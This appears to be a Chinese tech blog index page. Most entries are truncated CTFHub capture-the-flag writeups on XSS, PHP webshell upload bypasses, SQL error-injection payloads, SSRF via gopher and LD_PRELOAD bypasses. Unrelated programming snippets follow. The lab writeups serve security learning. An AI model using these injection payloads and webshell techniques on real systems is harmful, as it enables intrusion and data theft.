    根据框里的内容直接右键查看网页源代码看到了其闭合方式然后去网页测试一下alert(1)反射';alert(1)看到确实存在去xssaq.cn创建一个项目把src粘过来在第一个输入框中再将返回回来的url复制粘贴到第二个输入框中';
  • CTFHub |文件上传 (无验证, 前端验证, .haccess绕过, MIME绕过, 00截断, 双写后缀, 文件头检查) Coding Happily CTF网络安全安全
    CTFHub|文件上传无验证使用工具:中国剑蚁(D:\AntSword_Loader\AntSword-Loader-v4.0.3-win32-x64\AntSword.exe)在下载这个工具的时候,浏览器拦截说有病毒。使用gitclone下载。十分丝滑。先上传文件a.php页面回显文件被放在:/load/a.php中打开中国剑蚁,右键添加数据,输入url(http://xxx.com/load/
  • CTFHub技能树信息泄露——PHPINFO 方心 CFT安全网络
    1.点击开启题目,打开给出的链接。2.链接是phpinfo的相关信息,大体浏览了一下看到了明显的flag标志。也可以ctrl+f输入flag查找。
  • CTFHub技能树web之文件上传(一) wz_fisher 安全web安全
    一.前置知识文件上传漏洞:文件上传功能是许多Web应用程序的常见功能之一,但在实施不当的情况下,可能会导致安全漏洞。文件上传漏洞的出现可能会使攻击者能够上传恶意文件,执行远程代码,绕过访问控制等。文件类型验证:Web应用程序通常会对上传的文件类型进行验证,以确保只允许特定类型的文件上传。这种验证可以通过检查文件扩展名或内容类型(MIME类型)来实现。然而,这种验证机制往往是不可靠的,因为攻击者可以
  • CTFHub技能树web之文件上传(二) wz_fisher 网络安全安全
    第四题:MIME绕过MIME类型校验就是我们在上传文件到服务端的时候,服务端会对客户端也就是我们上传的文件的Content-Type类型进行检测,如果是白名单所允许的,则可以正常上传,否则上传失败。首先对上传的一句话木马抓包将Content-Type这一栏改为image/jpeg上传成功,使用蚁剑连接,成功连接第五题:00截断%00是截断的意思,后面的内容舍弃上传一句话木马,抓包将filename
  • CTFHub技能树web之RCE(二) wz_fisher 网络安全
    第五题:远程包含根据题目,使用远程包含进行打开phpinfo,可以看到allow_url_fopen和allow_url_include都是On,因此可以使用php://input,由于代码会检查file中的内容,因此不能够使用php://filter包含文件,使用php://input通过hackbar使用POST方式发包,抓包并在最后一行加php代码执行成功得到flag第六题:命令注入首先熟悉
  • CTFHub技能树web之RCE(一) wz_fisher 网络安全
    RCE是php的代码执行简称,是RemoteCommandExec(远程命令执行)和RemoteCodeExec(远程代码执行)的缩写;Command指的是操作系统的命令,code指的是脚本语言(php)的代码。第一题:eval执行根据代码可以看到该网页使用request得到cmd参数并使用eval执行cmd的代码,其中isset函数用于检测是否传入了一个名为cmd的变量的值(是否非空),eval
  • ctfhub每日签到 yzzob 程序人生
    1.python实现importtimeimportosfromdatetimeimportdatetimeimportrequestsheaders={"Accept":"application/json,text/plain,*/*","Accept-Encoding":"gzip,deflate,br","Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8,e
  • CTFHUB-WEB-SQL注入-报错注入 老大的豆豆酱 CTFmysql安全
    报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。题目:靶机环境:输入1时,显示正确输入一个随意的字符串后,显示错误。求数据库名:输入1unionselectupdatexml(1,concat(0x7e,database(),0x7e),1);,页面报错:求表名:输入1unionselectupdatexml(1,concat(0x7e,(select(g
  • CTFHub-Web-密码口令 WriteUp 曾小健_0532
    一、弱口令  1.题目内容  2.解题思路  使用burpsuite进行字典爆破  3.解题过程  首先抓包  使用intruder模块进行爆破  得到正确的口令,CaptureTheFlag!二、默认口令  1.题目内容  2.解题思路  网上查找该产品的默认用户名和密码  3.解题过程  查询到默认用户名为eyougw,密码为admin@(eyou),成功登陆后,CaptureTheFlag!
  • 小迪渗透&CTF夺旗&SRC挖掘(拾叁) 进击的网安攻城狮 pythonflaskpycharm
    文章目录83.Python考点SSTI&反序列化&字符串(83-88)演示案例:涉及资源84.PHP弱类型&异或取反&序列化&RCEPHP常考点弱类型绕过对比总结反序列化考点:网鼎杯2020-青龙组-web-AreUserialzpreg_match绕过-ctfhub-2020-第五空间智能安全大赛-web-hate-php涉及资源85.JAVA反编译&XXE&反序列化Java常考点及出题思路Ja
  • CTFHUB SSRF POST小记 I_WORM 安全ctfhubssrfpost
    这关考察的是gopher伪协议构造post请求;gopher伪协议总结:SSRF笔记整理-CSDN博客有很多的细节需要注意格式:gopher://192.168.232.125:80/_+下面url编码后的内容默认访问70端口,访问web时需要改为80端口%0A时linux下的换行符,windows下需要改为%0D%0A(小写也行,window不区分大小写)gopher伪协议的数据的第一字符不识别
  • CTFHUB技能树-SSRF【持续更新】 M1r4n SSRFctfhubCTFphpwebpost
    CTFHUBSSRF0x00POST请求首先开始解题构造gopher数据构造获取flag数据0x01上传文件废话首先构造请求构造gopher数据构造获取flag数据0x00POST请求最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post请求那个折腾了几天终于弄懂了,把过程记录下。首先我们看下题目描述,这个肯定是不能错过的。*描述:发一个HTT
  • ctf web方向与php学习记录27 这周末在做梦 SSRFbypasslinuxc++c语言c#
    针对一道ctfhub上的LD_PRELOAD,我进行了为期三天的学习和总结,以下是总结和收集的资料,由于是在onenote上作的笔记,就不在花功夫对文字进行编辑了,大家自行阅览,希望能对你起到帮助。接下来我给出的wp。一,蚁剑连接二,创建hack.c并转共享hack.sohack.c代码#include#include#include__attribute__((__constructor__))
  • CTFHub:工业信息安全技能大赛 -WP 五行缺你94 ctfctf简单工厂模式
    WiFi题目描述在无线WIFI通信中,黑客截获了数据包,想破解里面的密码,请找出里面的flag。题目考点力控软件使用解题思路将may目录下的文件内容去掉[]之后组成字典,使用aircrack-ng直接跑包,找到的密码即为flagFlagflag{0TUMVxz0JrUSDxHG}Login题目描述黑客渗透进入某工业企业内网,发现了登录界面,截获了登录时的流量包,根据社会工程学知识,密码是一串有意义
  • CTFHUB web进阶学习 Je3Z webctflinuxphp
    CTFHub之web进阶学习PHP突破disable_functions常用姿势以及使用Fuzz挖掘含内部系统调用的函数Linux动态加载器ctfhub动态加载器linux–>ldd命令的介绍就是没有x执行程序的权限,然后我们要执行/readflag来拿到flag,这里就用到了linux动态库链接器/加载器ld-linux.so.2这里我们直接ldd/readflag列出所需要得动态链接库然后再/
  • CTFHub:web-LD_PRELOAD-WP 五行缺你94 ctfandroidctf
    解题思路思路分析根据资料可得知有四种绕过disable_functions的手法:攻击后端组件,寻找存在命令注入的web应用常用的后端组件,如,ImageMagick的魔图漏洞、bash的破壳漏洞等等寻找未禁用的漏网函数,常见的执行命令的函数有system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open()、pcntl_exec(),逐一
  • CTFHUB JWT(Json Web Token) 葫芦娃42 CTFHub技能树json
    官方解释链接:JWT基础知识目录什么是JWT(基础知识)JWT的原理JWT的数据结构HeaderPayloadSignature敏感信息泄露none算法(无签名)弱密钥(c-jwt-cracker爆破密钥)修改签名算法什么是JWT(基础知识)JsonWebToken(JWT),是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准(RFC7519。该token被设计为紧凑且安全的,特别适
  • CTF之think_java反序列化完整案例 出顾茅庐 WEBCTFjava安全
    2020-网鼎杯-朱雀组-Web-think_java详解环境复现CTFHub附件代码审计通过打开附件文件中test类文件发现//发现文件路劲@RequestMapping({"/common/test"})publicclassTest{publicTest(){}@PostMapping({"/sqlDict"})//通过文件命名可以发现是关于sql的文件@Access@ApiOperatio
  • CTFhub-网站源码 郭子不想改bug CTF-web服务器运维
    CTFhub-Web-信息泄露-备份文件下载-网站源码题目信息解题过程无脑爆破(笑写个python脚本importrequests#这里的url是你的地址url="http://challenge-67a05a3755f2610d.sandbox.ctfhub.com:10800/"list1=['web','website','backup','back','www','wwwroot','te
  • CTFhub-bak文件 郭子不想改bug CTF-web安全
    CTFhub-Web-信息泄露-备份文件下载-bak文件题目信息解题过程看到提示说和index.php有关,在url后面加index.php.bak,跳转到http://challenge-7a4da2076cfabae6.sandbox.ctfhub.com:10800/index.php.bak网址,即:跳转到下载页面,下载内容为:这就是我们需要的flag!
  • CTFHub-技能树-SQL注入 Patrick_star__
    整数型注入不需考虑任何过滤,由于始终只返回第一行的信息,所以使用LIMIT来查看其他行的返回。常规注入流程:爆数据库名->爆表名->爆字段名->使用unionselect获得想要知道的对应字段的内容。爆数据库名1unionselectdatabase(),1limit1,2数据库为sqli爆表名通过更改limit的值得到sqli数据库中可能藏有flag的表名1unionselecttable_na
  • CTF初体验 捞虾米 网安入门安全
    靶场:www.ctfhub.com第一题一、题目信息1.题目名称:请求方式2.题目难度:3.题目描述:HTTP请求方法,HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源二、解题思路打开页面显示1.思考过程:在面对需要采用GET方法的情况下,我首先想到了使用BurpSuite进行抓包。然而,在初始阶段,我并未对网页的其他文字内容给予充分关注,这导致了一段时间的抓包过程中始
  • CTFHUB--SSRF详解 小蓝同学` 信息安全漏洞webkalilinux安全漏洞渗透测试
    SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描二、(POST上传文件FastCGI协议Redis协议)2.1POST请求2.2上传文件2.3FastCGI协议2.4Redis协议三、(Bypass系列)3.1URLBypass3.2数字IPBypass3.3302跳转Bypass3.4DNS重绑定BypassSSRF漏洞介绍  SSRT(S
  • CTFhub-Web-Web前置技能-“302跳转“ 郭子不想改bug CTF-web前端
    题目信息HTTP临时重定向,题目截图如下所示:分析过程看到跳转路径为:http://challenge-d1a96d97eaecf029.sandbox.ctfhub.com:10800/index.html分析可能存在重定向问题,如果要想获得flag,则可能存在http://challenge-d1a96d97eaecf029.sandbox.ctfhub.com:10800/flag.txt解
  • CTFhub-Cookie 郭子不想改bug CTF-web服务器运维
    CTFhub-Web-Web前置技能-“Cookie”题目分析图片显示需要admin权限解题过程F12打开开发者工具,在consolo里输入document.cookie=‘admin=1’可获得:按F5刷新即可获得flag在consolo里再次输入document.cookie=‘admin=0’,可进行刷新或者通过Application-cookie修改admin的值为1也可
  • CTFhub-HTTP响应包源代码查看 郭子不想改bug CTF-web前端
    CTFhub-Web-Web前置技能-“HTTP响应包源代码查看”题目分析页面空白,想到flag也许在源代码中解题过程F12,在element中,看到html代码,在其body中找到flag
  • CTFhub-目录遍历 郭子不想改bug CTF-web前端安全
    CTFhub-Web-信息泄露-“目录遍历”题目解题过程这个题我不太懂…但是使用chrome似乎不行,需要换浏览器(edge或者firefox都可)…难道是chrome已经对目录暴力遍历进行了限制?
  • [GKCTF 2020]cve版签到 妙尽璇机 ctfweb安全网络安全
    [GKCTF2020]cve版签到wp信息搜集题目页面:页面中有提示:Youjustview*.ctfhub.com点一下ViewCTFHub会回弹一些信息:抓包看看:url传参,判断是ssrf。但是当我将其改为http://www.baidu.com或者是http://127.0.0.1时却没有任何响应:看了大佬的博客,知道了这是cve-2020-7066。cve-2020-7066根据阿里云漏
  • CTFHub-Web-信息泄露 WriteUp 曾小健_0532
    一、目录遍历  1.题目内容  点击绿色按钮,进入到一个Web根文件夹中,要求我们遍历所有文件夹,找到flag  2.解题思路  由于本题根目录下包含4个文件夹,每个文件夹下面又都包含了4个子文件夹,数量并不多,因此可以采用人工搜寻的方式。但是当遇到文件夹数量过多时,需要编写脚本来自动遍历寻找。  3.解题过程  编写了一个Python脚本,自动进行遍历importrequestsbase_url
  • Algorithm 香水浓 javaAlgorithm
    冒泡排序 public static void sort(Integer[] param) { for (int i = param.length - 1; i > 0; i--) { for (int j = 0; j < i; j++) { int current = param[j]; int next = param[j + 1];
  • mongoDB 复杂查询表达式 开窍的石头 mongodb
    1:count    Pg: db.user.find().count();    统计多少条数据 2:不等于$ne    Pg: db.user.find({_id:{$ne:3}},{name:1,sex:1,_id:0});    查询id不等于3的数据。 3:大于$gt $gte(大于等于) &n
  • Jboss Java heap space异常解决方法, jboss OutOfMemoryError : PermGen space 0624chenhong jvmjboss
    转自 http://blog.csdn.net/zou274/article/details/5552630 解决办法: window->preferences->java->installed jres->edit jre 把default vm arguments 的参数设为-Xms64m -Xmx512m ----------------
  • 文件上传 下载 解析 相对路径 不懂事的小屁孩 文件上传
    有点坑吧,弄这么一个简单的东西弄了一天多,身边还有大神指导着,网上各种百度着。 下面总结一下遇到的问题: 文件上传,在页面上传的时候,不要想着去操作绝对路径,浏览器会对客户端的信息进行保护,避免用户信息收到攻击。 在上传图片,或者文件时,使用form表单来操作。 前台通过form表单传输一个流到后台,而不是ajax传递参数到后台,代码如下: <form action=&
  • 怎么实现qq空间批量点赞 换个号韩国红果果 qq
    纯粹为了好玩!! 逻辑很简单 1 打开浏览器console;输入以下代码。 先上添加赞的代码 var tools={}; //添加所有赞 function init(){ document.body.scrollTop=10000; setTimeout(function(){document.body.scrollTop=0;},2000);//加
  • 判断是否为中文 灵静志远 中文
    方法一: public class Zhidao { public static void main(String args[]) { String s = "sdf灭礌 kjl d{';\fdsjlk是"; int n=0; for(int i=0; i<s.length(); i++) { n = (int)s.charAt(i); if((
  • 一个电话面试后总结 a-john 面试
    今天,接了一个电话面试,对于还是初学者的我来说,紧张了半天。 面试的问题分了层次,对于一类问题,由简到难。自己觉得回答不好的地方作了一下总结:   在谈到集合类的时候,举几个常用的集合类,想都没想,直接说了list,map。   然后对list和map分别举几个类型:   list方面:ArrayList,LinkedList。在谈到他们的区别时,愣住了
  • MSSQL中Escape转义的使用 aijuans MSSQL
    IF OBJECT_ID('tempdb..#ABC') is not null drop table tempdb..#ABC create table #ABC ( PATHNAME NVARCHAR(50) ) insert into #ABC SELECT N'/ABCDEFGHI' UNION ALL SELECT N'/ABCDGAFGASASSDFA' UNION ALL
  • 一个简单的存储过程 asialee mysql存储过程构造数据批量插入
               今天要批量的生成一批测试数据,其中中间有部分数据是变化的,本来想写个程序来生成的,后来想到存储过程就可以搞定,所以随手写了一个,记录在此:            DELIMITER $$ DROP PROCEDURE IF EXISTS inse
  • annot convert from HomeFragment_1 to Fragment 百合不是茶 android导包错误
    创建了几个类继承Fragment, 需要将创建的类存储在ArrayList<Fragment>中; 出现不能将new 出来的对象放到队列中,原因很简单;     创建类时引入包是:import android.app.Fragment;      创建队列和对象时使用的包是:import android.support.v4.ap
  • Weblogic10两种修改端口的方法 bijian1013 weblogic端口号配置管理config.xml
    一.进入控制台进行修改    1.进入控制台:  http://127.0.0.1:7001/console     2.展开左边树菜单         域结构->环境->服务器-->点击AdminServer(管理) &
  • mysql 操作指令 征客丶 mysql
    一、连接mysql 进入 mysql 的安装目录; $ bin/mysql -p [host IP 如果是登录本地的mysql 可以不写 -p 直接 -u] -u [userName] -p 输入密码,回车,接连; 二、权限操作[如果你很了解mysql数据库后,你可以直接去修改系统表,然后用 mysql> flush privileges; 指令让权限生效] 1、赋权 mys
  • 【Hive一】Hive入门 bit1129 hive
    Hive安装与配置 Hive的运行需要依赖于Hadoop,因此需要首先安装Hadoop2.5.2,并且Hive的启动前需要首先启动Hadoop。   Hive安装和配置的步骤   1. 从如下地址下载Hive0.14.0   http://mirror.bit.edu.cn/apache/hive/    2.解压hive,在系统变
  • ajax 三种提交请求的方法 BlueSkator Ajaxjqery
    1、ajax 提交请求 $.ajax({ type:"post", url : "${ctx}/front/Hotel/getAllHotelByAjax.do", dataType : "json", success : function(result) { try { for(v
  • mongodb开发环境下的搭建入门 braveCS 运维
      linux下安装mongodb 1)官网下载mongodb-linux-x86_64-rhel62-3.0.4.gz 2)linux 解压  gzip -d mongodb-linux-x86_64-rhel62-3.0.4.gz; mv mongodb-linux-x86_64-rhel62-3.0.4 mongodb-linux-x86_64-rhel62-
  • 编程之美-最短摘要的生成 bylijinnan java数据结构算法编程之美
    import java.util.HashMap; import java.util.Map; import java.util.Map.Entry; public class ShortestAbstract { /** * 编程之美 最短摘要的生成 * 扫描过程始终保持一个[pBegin,pEnd]的range,初始化确保[pBegin,pEnd]的ran
  • json数据解析及typeof chengxuyuancsdn jstypeofjson解析
    // json格式 var people='{"authors": [{"firstName": "AAA","lastName": "BBB"},' +' {"firstName": "CCC&
  • 流程系统设计的层次和目标 comsci 设计模式数据结构sql框架脚本
                                  流程系统设计的层次和目标  
  • RMAN List和report 命令 daizj oraclelistreportrman
    LIST 命令 使用RMAN LIST 命令显示有关资料档案库中记录的备份集、代理副本和映像副本的 信息。使用此命令可列出: • RMAN 资料档案库中状态不是AVAILABLE 的备份和副本 • 可用的且可以用于还原操作的数据文件备份和副本 • 备份集和副本,其中包含指定数据文件列表或指定表空间的备份 • 包含指定名称或范围的所有归档日志备份的备份集和副本 • 由标记、完成时间、可
  • 二叉树:红黑树 dieslrae 二叉树
        红黑树是一种自平衡的二叉树,它的查找,插入,删除操作时间复杂度皆为O(logN),不会出现普通二叉搜索树在最差情况时时间复杂度会变为O(N)的问题.     红黑树必须遵循红黑规则,规则如下     1、每个节点不是红就是黑。     2、根总是黑的  &
  • C语言homework3,7个小题目的代码 dcj3sjt126com c
    1、打印100以内的所有奇数。 # include <stdio.h> int main(void) { int i; for (i=1; i<=100; i++) { if (i%2 != 0) printf("%d ", i); } return 0; }  2、从键盘上输入10个整数,
  • 自定义按钮, 图片在上, 文字在下, 居中显示 dcj3sjt126com 自定义
    #import <UIKit/UIKit.h> @interface MyButton : UIButton -(void)setFrame:(CGRect)frame ImageName:(NSString*)imageName Target:(id)target Action:(SEL)action Title:(NSString*)title Font:(CGFloa
  • MySQL查询语句练习题,测试足够用了 flyvszhb sqlmysql
    http://blog.sina.com.cn/s/blog_767d65530101861c.html 1.创建student和score表 CREATE  TABLE  student ( id  INT(10)  NOT NULL  UNIQUE  PRIMARY KEY  , name  VARCHAR
  • 转:MyBatis Generator 详解 happyqing mybatis
      MyBatis Generator 详解 http://blog.csdn.net/isea533/article/details/42102297   MyBatis Generator详解 http://git.oschina.net/free/Mybatis_Utils/blob/master/MybatisGeneator/MybatisGeneator.
  • 让程序员少走弯路的14个忠告 jingjing0907 工作计划学习
      无论是谁,在刚进入某个领域之时,有再大的雄心壮志也敌不过眼前的迷茫:不知道应该怎么做,不知道应该做什么。下面是一名软件开发人员所学到的经验,希望能对大家有所帮助   1.不要害怕在工作中学习。 只要有电脑,就可以通过电子阅读器阅读报纸和大多数书籍。如果你只是做好自己的本职工作以及分配的任务,那是学不到很多东西的。如果你盲目地要求更多的工作,也是不可能提升自己的。放
  • nginx和NetScaler区别 流浪鱼 nginx
    NetScaler是一个完整的包含操作系统和应用交付功能的产品,Nginx并不包含操作系统,在处理连接方面,需要依赖于操作系统,所以在并发连接数方面和防DoS攻击方面,Nginx不具备优势。 2.易用性方面差别也比较大。Nginx对管理员的水平要求比较高,参数比较多,不确定性给运营带来隐患。在NetScaler常见的配置如健康检查,HA等,在Nginx上的配置的实现相对复杂。 3.策略灵活度方
  • 第11章 动画效果(下) onestopweb 动画
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • FAQ - SAP BW BO roadmap blueoxygen BOBW
    http://www.sdn.sap.com/irj/boc/business-objects-for-sap-faq   Besides, I care that how to integrate tightly.   By the way, for BW consultants, please just focus on Query Designer which i
  • 关于java堆内存溢出的几种情况 tomcat_oracle javajvmjdkthread
    【情况一】:    java.lang.OutOfMemoryError: Java heap space:这种是java堆内存不够,一个原因是真不够,另一个原因是程序中有死循环;   如果是java堆内存不够的话,可以通过调整JVM下面的配置来解决:   <jvm-arg>-Xms3062m</jvm-arg>   <jvm-arg>-Xmx
  • Manifest.permission_group权限组 阿尔萨斯 Permission
    结构 继承关系 public static final class Manifest.permission_group extends Object java.lang.Object android. Manifest.permission_group 常量 ACCOUNTS 直接通过统计管理器访问管理的统计 COST_MONEY可以用来让用户花钱但不需要通过与他们直接牵涉的权限 D
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他